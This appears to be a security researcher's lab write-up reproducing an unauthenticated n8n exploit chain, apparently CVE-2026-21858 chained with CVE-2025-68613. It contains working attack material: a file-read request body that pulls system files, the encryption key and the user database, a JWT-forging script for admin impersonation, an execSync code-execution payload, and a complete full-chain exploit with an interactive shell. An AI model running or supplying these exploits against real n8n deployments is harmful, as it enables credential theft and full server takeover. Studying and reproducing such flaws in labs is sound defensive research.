CVE-2026-21858 Reproduction (n8n Unauthenticated RCE)

Setup

Download the project from https://github.com/Chocapikk/CVE-2026-21858 and deploy n8n with Docker. The default account is admin@exploit.local with password ExploitLab123!, but do not log in yet.

Reproducing the vulnerability

Arbitrary file read

First, the unauthenticated endpoint the author set up in the lab is /form/vulnerable-form

image-20260108194941529

It is simply a file upload form. I followed this article: https://www.cyera.com/research-labs/ni8mare-unauthenticated-remote-code-execution-in-n8n-cve-2026-21858

Upload any file and capture the request

Change Content-Type to application/json and use the following request body:

{
    "data": {},
    "files": {
        "field-0": {
            "filepath": "/etc/passwd",
            "originalFilename": "1.pdf",
            "mimetype": "text/plain",
            "extension": ""
        }
    }
}

image-20260108195150279

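In the original article the file contents had to be retrieved by chatting with the AI. This lab is more direct: the response echoes the file back. At this point we have an arbitrary file read.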

Forging the admin JWT

n8n stores the authenticated session in a cookie named n8n-auth. The figure shows how the cookie value is generated

image-20260108200409118

So we need to read the database file to get the id, email and password

Then we need n8n's key to sign this JSON and obtain the JWT

image-20260108200738144

If n8n is deployed with Docker, these are stored in the .n8n directory under the home directory

image-20260108200920736

The database file holds the id, email and password, and as the figure shows, the key can be read from config

First, find out the home directory

image-20260108201119926

It belongs to root. Next, read the other two files
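
The screenshots do not show which file was requested to find the home directory. The script later in this post reads /proc/self/environ and looks for the HOME= entry. A minimal sketch of that parsing step, run against made-up sample bytes rather than a real response, might look like this (parse_environ and the sample values are hypothetical names for illustration):

```python
def parse_environ(blob: bytes) -> dict[str, str]:
    """Split a NUL-separated /proc/<pid>/environ dump into a dict."""
    env: dict[str, str] = {}
    for entry in blob.split(b"\x00"):
        if b"=" not in entry:
            continue  # skip the empty trailing entry and malformed items
        name, _, value = entry.partition(b"=")  # split on the first "=" only
        env[name.decode(errors="replace")] = value.decode(errors="replace")
    return env


# Hypothetical sample, shaped like what a container might return.
sample = b"PATH=/usr/local/bin:/usr/bin\x00HOME=/root\x00NODE_ENV=production\x00"
print(parse_environ(sample)["HOME"])
```

Entries in that file are separated by NUL bytes rather than newlines, which is why the raw response looks like one long line in Burp.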

image-20260108202340251

For the database, copy the entire response in Burp, strip the response headers, and export what remains
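
Once the database is saved to disk, it is worth checking that the export is intact before querying it. The sketch below assumes the same table layout that the script later in this post queries (a user table with id, email, password and role columns, with the owner marked as global:owner). The function names and the placeholder row are made up for illustration.

```python
from __future__ import annotations

import sqlite3
import tempfile
from pathlib import Path

SQLITE_MAGIC = b"SQLite format 3\x00"  # first 16 bytes of every SQLite 3 file


def looks_like_sqlite(path: str) -> bool:
    """Return True if the file starts with the SQLite 3 header."""
    with open(path, "rb") as f:
        return f.read(16) == SQLITE_MAGIC


def read_owner(path: str) -> tuple[str, str, str] | None:
    """Return (id, email, password hash) of the owner row, if any."""
    conn = sqlite3.connect(path)
    try:
        row = conn.execute(
            'SELECT id, email, password FROM "user" '
            "WHERE role = 'global:owner' LIMIT 1"
        ).fetchone()
    finally:
        conn.close()
    return (row[0], row[1], row[2]) if row else None


def demo() -> tuple[str, str, str] | None:
    """Build a throwaway database with placeholder values and query it."""
    with tempfile.TemporaryDirectory() as tmp:
        path = str(Path(tmp) / "database.sqlite")
        conn = sqlite3.connect(path)
        conn.execute('CREATE TABLE "user" (id TEXT, email TEXT, password TEXT, role TEXT)')
        conn.execute(
            'INSERT INTO "user" VALUES (?, ?, ?, ?)',
            ("u-1", "owner@example.test", "$2a$10$placeholder", "global:owner"),
        )
        conn.commit()
        conn.close()
        assert looks_like_sqlite(path)
        return read_owner(path)


print(demo())
```

If looks_like_sqlite returns False for the exported file, the headers were probably not stripped cleanly or the bytes were altered while copying.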

Here I had an AI write a script that generates the JWT

import hashlib
import jwt
from base64 import b64encode

def generate_n8n_admin_token(uid, email, pw_hash, encryption_key):
    # 1. Derive the signing key (secret derivation)
    # Logic: take every other character of encryptionKey, then SHA-256 it and hex-encode the digest
    sliced_key = encryption_key[::2]
    secret = hashlib.sha256(sliced_key.encode()).hexdigest()
    
    # 2. Compute the hash field of the payload
    # Logic: join email and password hash with ":", SHA-256 the result, Base64-encode it, keep the first 10 characters
    hash_input = f"{email}:{pw_hash}".encode()
    hash_digest = hashlib.sha256(hash_input).digest()
    h_claim = b64encode(hash_digest).decode()[:10]
    
    # 3. Build the payload
    payload = {
        "id": uid,
        "hash": h_claim
    }
    
    # 4. Sign with HS256 using the derived secret
    token = jwt.encode(payload, secret, algorithm="HS256")
    
    return token, secret, h_claim

# Input parameters
target_id = "6dfdc046-c3b2-4a24-895a-aa8861f42fe1"
target_email = "admin@exploit.local"
target_pw_hash = "$2a$10$thRakOhxmhH6bmEI1z9BpOmdfQcIy21gspPPtplBE0.8EqwteET2e"
target_enc_key = "JtBYHUPkTyEiJviVWXtFhZcUudLlL7eb"

# Generate the token
token, derived_secret, derived_hash = generate_n8n_admin_token(
    target_id, target_email, target_pw_hash, target_enc_key
)

print("-" * 30)
print(f"[*] Derived secret: {derived_secret}")
print(f"[*] Payload hash claim: {derived_hash}")
print(f"[*] Generated JWT token:\n{token}")
print("-" * 30)
print(f"Usage:\nAdd this request header: Cookie: n8n-auth={token}")
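
To sanity-check a token before pasting it into the browser, the claims can be decoded and the HS256 signature recomputed with the standard library alone. This is a rough sketch and not part of the original workflow: inspect_hs256 and make_sample_token are hypothetical helper names, and the sample secret and claims are placeholders.

```python
import base64
import hashlib
import hmac
import json


def b64url_decode(segment: str) -> bytes:
    """Decode base64url text that has had its '=' padding stripped."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def b64url_encode(raw: bytes) -> str:
    """Encode bytes as unpadded base64url, as used in JWT segments."""
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def inspect_hs256(token: str, secret: str) -> tuple[dict, bool]:
    """Return (claims, signature_ok) for an HS256-signed JWT."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    signing_input = f"{header_b64}.{payload_b64}".encode()
    expected = hmac.new(secret.encode(), signing_input, hashlib.sha256).digest()
    claims = json.loads(b64url_decode(payload_b64))
    return claims, hmac.compare_digest(expected, b64url_decode(sig_b64))


def make_sample_token(claims: dict, secret: str) -> str:
    """Build a placeholder HS256 token so the demo needs no third-party package."""
    header = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    payload = b64url_encode(json.dumps(claims).encode())
    sig = hmac.new(secret.encode(), f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{b64url_encode(sig)}"


sample = make_sample_token({"id": "u-1", "hash": "abcdefghij"}, "placeholder-secret")
print(inspect_hs256(sample, "placeholder-secret"))
```

If the signature check fails against the derived secret, the encryption key was most likely copied incorrectly from the config file.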

image-20260108205341807

We are now logged in as admin

RCE

Next, refer to: https://github.com/wioui/n8n-CVE-2025-68613-exploit

image-20260108210124263

image-20260108210140710

image-20260108210458527

Put bluntly, this is just direct execution; there is not really any sandbox escape involved

{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}

Script

This is the script from the author's project

#!/usr/bin/env python3
"""
CVE-2026-21858 + CVE-2025-68613 - n8n Full Chain Exploit
Arbitrary File Read → Admin Token Forge → Sandbox Bypass → RCE

Author: Chocapikk
GitHub: https://github.com/Chocapikk/CVE-2026-21858
"""

import argparse
import hashlib
import json
import secrets
import sqlite3
import string
import tempfile
from base64 import b64encode

import jwt
import requests
from pwn import log

BANNER = """
╔═══════════════════════════════════════════════════════════════╗
║     CVE-2026-21858 + CVE-2025-68613 - n8n Full Chain          ║
║     Arbitrary File Read → Token Forge → Sandbox Bypass → RCE  ║
║                                                               ║
║     by Chocapikk                                              ║
╚═══════════════════════════════════════════════════════════════╝
"""

RCE_PAYLOAD = '={{ (function() { var require = this.process.mainModule.require; var execSync = require("child_process").execSync; return execSync("CMD").toString(); })() }}'


def randstr(n: int = 12) -> str:
    return "".join(secrets.choice(string.ascii_lowercase + string.digits) for _ in range(n))


def randpos() -> list[int]:
    return [secrets.randbelow(500) + 100, secrets.randbelow(500) + 100]


class Ni8mare:
    def __init__(self, base_url: str, form_path: str):
        self.base_url = base_url.rstrip("/")
        self.form_url = f"{self.base_url}/{form_path.lstrip('/')}"
        self.session = requests.Session()
        self.admin_token = None

    def _api(self, method: str, path: str, **kwargs) -> requests.Response | None:
        kwargs.setdefault("timeout", 30)
        kwargs.setdefault("cookies", {"n8n-auth": self.admin_token} if self.admin_token else {})
        resp = self.session.request(method, f"{self.base_url}{path}", **kwargs)
        return resp if resp.ok else None

    def _lfi_payload(self, filepath: str) -> dict:
        return {
            "data": {},
            "files": {
                f"f-{randstr(6)}": {
                    "filepath": filepath,
                    "originalFilename": f"{randstr(8)}.bin",
                    "mimetype": "application/octet-stream",
                    "size": secrets.randbelow(90000) + 10000
                }
            }
        }

    def _build_nodes(self, command: str) -> tuple[list, dict, str, str]:
        trigger_name, rce_name = f"T-{randstr(8)}", f"R-{randstr(8)}"
        result_var = f"v{randstr(6)}"
        payload_value = RCE_PAYLOAD.replace("CMD", command.replace('"', '\\"'))
        nodes = [
            {"parameters": {}, "name": trigger_name, "type": "n8n-nodes-base.manualTrigger",
             "typeVersion": 1, "position": randpos(), "id": f"t-{randstr(12)}"},
            {"parameters": {"values": {"string": [{"name": result_var, "value": payload_value}]}},
             "name": rce_name, "type": "n8n-nodes-base.set", "typeVersion": 2,
             "position": randpos(), "id": f"r-{randstr(12)}"}
        ]
        connections = {trigger_name: {"main": [[{"node": rce_name, "type": "main", "index": 0}]]}}
        return nodes, connections, trigger_name, rce_name

    # ========== Arbitrary File Read (CVE-2026-21858) ==========

    def read_file(self, filepath: str, timeout: int = 30) -> bytes | None:
        resp = self.session.post(
            self.form_url, json=self._lfi_payload(filepath),
            headers={"Content-Type": "application/json"}, timeout=timeout
        )
        return resp.content if resp.ok and resp.content else None

    def get_version(self) -> tuple[str, bool]:
        resp = self._api("GET", "/rest/settings", timeout=10)
        version = resp.json().get("data", {}).get("versionCli", "0.0.0") if resp else "0.0.0"
        major, minor = map(int, version.split(".")[:2])
        return version, major < 1 or (major == 1 and minor < 121)

    def get_home(self) -> str | None:
        data = self.read_file("/proc/self/environ")
        if not data:
            return None
        for var in data.split(b"\x00"):
            if var.startswith(b"HOME="):
                return var.decode().split("=", 1)[1]
        return None

    def get_key(self, home: str) -> str | None:
        data = self.read_file(f"{home}/.n8n/config")
        return json.loads(data).get("encryptionKey") if data else None

    def get_db(self, home: str) -> bytes | None:
        return self.read_file(f"{home}/.n8n/database.sqlite", timeout=120)

    def extract_admin(self, db: bytes) -> tuple[str, str, str] | None:
        with tempfile.NamedTemporaryFile(suffix=".db") as f:
            f.write(db)
            f.flush()
            conn = sqlite3.connect(f.name)
            row = conn.execute("SELECT id, email, password FROM user WHERE role='global:owner' LIMIT 1").fetchone()
            conn.close()
        return (row[0], row[1], row[2]) if row else None

    def forge_token(self, key: str, uid: str, email: str, pw_hash: str) -> str:
        secret = hashlib.sha256(key[::2].encode()).hexdigest()
        h = b64encode(hashlib.sha256(f"{email}:{pw_hash}".encode()).digest()).decode()[:10]
        self.admin_token = jwt.encode({"id": uid, "hash": h}, secret, "HS256")
        return self.admin_token

    def verify_token(self) -> bool:
        return self._api("GET", "/rest/users", timeout=10) is not None

    # ========== RCE (CVE-2025-68613) ==========

    def rce(self, command: str) -> str | None:
        nodes, connections, _, _ = self._build_nodes(command)
        wf_name = f"wf-{randstr(16)}"
        workflow = {"name": wf_name, "active": False, "nodes": nodes,
                    "connections": connections, "settings": {}}

        resp = self._api("POST", "/rest/workflows", json=workflow, timeout=10)
        if not resp:
            return None
        wf_id = resp.json().get("data", {}).get("id")
        if not wf_id:
            return None

        run_data = {"workflowData": {"id": wf_id, "name": wf_name, "active": False,
                                      "nodes": nodes, "connections": connections, "settings": {}}}
        resp = self._api("POST", f"/rest/workflows/{wf_id}/run", json=run_data, timeout=30)
        if not resp:
            self._api("DELETE", f"/rest/workflows/{wf_id}", timeout=5)
            return None

        exec_id = resp.json().get("data", {}).get("executionId")
        result = self._get_result(exec_id) if exec_id else None
        self._api("DELETE", f"/rest/workflows/{wf_id}", timeout=5)
        return result

    def _get_result(self, exec_id: str) -> str | None:
        resp = self._api("GET", f"/rest/executions/{exec_id}", timeout=10)
        if not resp:
            return None
        data = resp.json().get("data", {}).get("data")
        if not data:
            return None
        parsed = json.loads(data)
        # Result is usually the last non-empty string
        for item in reversed(parsed):
            if isinstance(item, str) and len(item) > 3 and item not in ("success", "error"):
                return item.strip()
        return None

    # ========== Full Chain ==========

    def pwn(self) -> bool:
        p = log.progress("HOME directory")
        home = self.get_home()
        if not home:
            return p.failure("Not found") or False
        p.success(home)

        p = log.progress("Encryption key")
        key = self.get_key(home)
        if not key:
            return p.failure("Failed") or False
        p.success(f"{key[:8]}...")

        p = log.progress("Database")
        db = self.get_db(home)
        if not db:
            return p.failure("Failed") or False
        p.success(f"{len(db)} bytes")

        p = log.progress("Admin user")
        admin = self.extract_admin(db)
        if not admin:
            return p.failure("Not found") or False
        uid, email, pw = admin
        p.success(email)

        p = log.progress("Token forge")
        self.forge_token(key, uid, email, pw)
        p.success("OK")

        p = log.progress("Admin access")
        if not self.verify_token():
            return p.failure("Rejected") or False
        p.success("GRANTED!")

        log.success(f"Cookie: n8n-auth={self.admin_token}")
        return True


def parse_args():
    p = argparse.ArgumentParser(description="n8n Ni8mare - Full Chain Exploit")
    p.add_argument("url", help="Target URL (http://target:5678)")
    p.add_argument("form", help="Form path (/form/upload)")
    p.add_argument("--read", metavar="PATH", help="Read arbitrary file")
    p.add_argument("--cmd", metavar="CMD", help="Execute single command")
    p.add_argument("-o", "--output", metavar="FILE", help="Save LFI output to file")
    return p.parse_args()


def run_read(exploit: Ni8mare, path: str, output: str | None) -> None:
    data = exploit.read_file(path)
    if not data:
        log.error("File read failed")
        return
    log.success(f"{len(data)} bytes")
    if output:
        with open(output, "wb") as f:
            f.write(data)
        log.success(f"Saved: {output}")
        return
    print(data.decode())


def run_cmd(exploit: Ni8mare, cmd: str) -> None:
    p = log.progress("RCE")
    out = exploit.rce(cmd)
    if not out:
        p.failure("Failed")
        return
    p.success("OK")
    print(f"\n{out}")


def run_shell(exploit: Ni8mare) -> None:
    log.info("Interactive mode (type 'exit' to quit)")
    while True:
        try:
            cmd = input("\033[91mn8n\033[0m> ").strip()
        except (EOFError, KeyboardInterrupt):
            print()
            return
        if not cmd or cmd == "exit":
            return
        out = exploit.rce(cmd)
        if out:
            print(out)


def main():
    print(BANNER)
    args = parse_args()

    exploit = Ni8mare(args.url, args.form)
    version, vuln = exploit.get_version()
    log.info(f"Target: {exploit.form_url}")
    log.info(f"Version: {version} ({'VULN' if vuln else 'SAFE'})")

    if args.read:
        run_read(exploit, args.read, args.output)
        return

    if not exploit.pwn():
        return

    if args.cmd:
        run_cmd(exploit, args.cmd)
        return

    run_shell(exploit)


if __name__ == "__main__":
    main()
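
The get_version method above labels a target VULN when its reported version is below 1.121. Pulled out on its own, that comparison could be sketched as follows. is_vulnerable is a hypothetical helper name, and the sketch assumes a plain dotted numeric version string.

```python
def is_vulnerable(version: str) -> bool:
    """Mirror the script's check: anything below 1.121 is treated as vulnerable."""
    major, minor = (int(part) for part in version.split(".")[:2])
    return (major, minor) < (1, 121)


for candidate in ("1.120.4", "1.121.0", "2.0.0"):
    print(candidate, is_vulnerable(candidate))
```

Comparing (major, minor) as a tuple gives the same result as the script's `major < 1 or (major == 1 and minor < 121)` expression.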

Usage

# Run a single command
python exploit.py http://localhost:5678 /form/vulnerable-form --cmd "id"
# Interactive shell
python exploit.py http://localhost:5678 /form/vulnerable-form

Limitations

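First, a file upload form is required: the target must have a form workflow with a file upload field. Second, after we modify the request, the response must echo the file contents back. Third, the workflow must accept uploads without authentication.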

For example, the following configuration is exposed to this attack

{
  "nodes": [
    {
      "name": "Form Trigger",
      "type": "n8n-nodes-base.formTrigger",
      "parameters": {
        "responseMode": "responseNode",
        "formFields": {
          "values": [{ "fieldLabel": "document", "fieldType": "file" }]
        }
      }
    },
    {
      "name": "Respond",
      "type": "n8n-nodes-base.respondToWebhook",
      "parameters": {
        "respondWith": "binary",
        "inputDataFieldName": "document"
      }
    }
  ],
  "connections": {
    "Form Trigger": { "main": [[{ "node": "Respond" }]] }
  }
}
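
For auditing your own instance, exported workflow JSON can be scanned for this pattern. The following is a rough heuristic sketch, not an official n8n tool: find_exposed_file_forms is a hypothetical name, it only checks nodes wired directly to the trigger, and it does not look at authentication settings.

```python
import json


def find_exposed_file_forms(workflow: dict) -> list[str]:
    """Names of Form Trigger nodes with a file field feeding a binary response."""
    nodes = {n.get("name"): n for n in workflow.get("nodes", [])}
    connections = workflow.get("connections", {})
    findings: list[str] = []
    for name, node in nodes.items():
        if node.get("type") != "n8n-nodes-base.formTrigger":
            continue
        fields = node.get("parameters", {}).get("formFields", {}).get("values", [])
        if not any(f.get("fieldType") == "file" for f in fields):
            continue
        # Look only at the nodes directly downstream of the trigger.
        for branch in connections.get(name, {}).get("main", []):
            for link in branch or []:
                target = nodes.get(link.get("node"), {})
                is_respond = target.get("type") == "n8n-nodes-base.respondToWebhook"
                is_binary = target.get("parameters", {}).get("respondWith") == "binary"
                if is_respond and is_binary and name not in findings:
                    findings.append(name)
    return findings


EXAMPLE = json.loads("""
{
  "nodes": [
    {"name": "Form Trigger", "type": "n8n-nodes-base.formTrigger",
     "parameters": {"responseMode": "responseNode",
                    "formFields": {"values": [{"fieldLabel": "document", "fieldType": "file"}]}}},
    {"name": "Respond", "type": "n8n-nodes-base.respondToWebhook",
     "parameters": {"respondWith": "binary", "inputDataFieldName": "document"}}
  ],
  "connections": {"Form Trigger": {"main": [[{"node": "Respond"}]]}}
}
""")
print(find_exposed_file_forms(EXAMPLE))
```

Any workflow this flags deserves a manual look; a clean result does not prove the instance is safe, since the response node may sit further downstream.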
Licensed under 9u_l3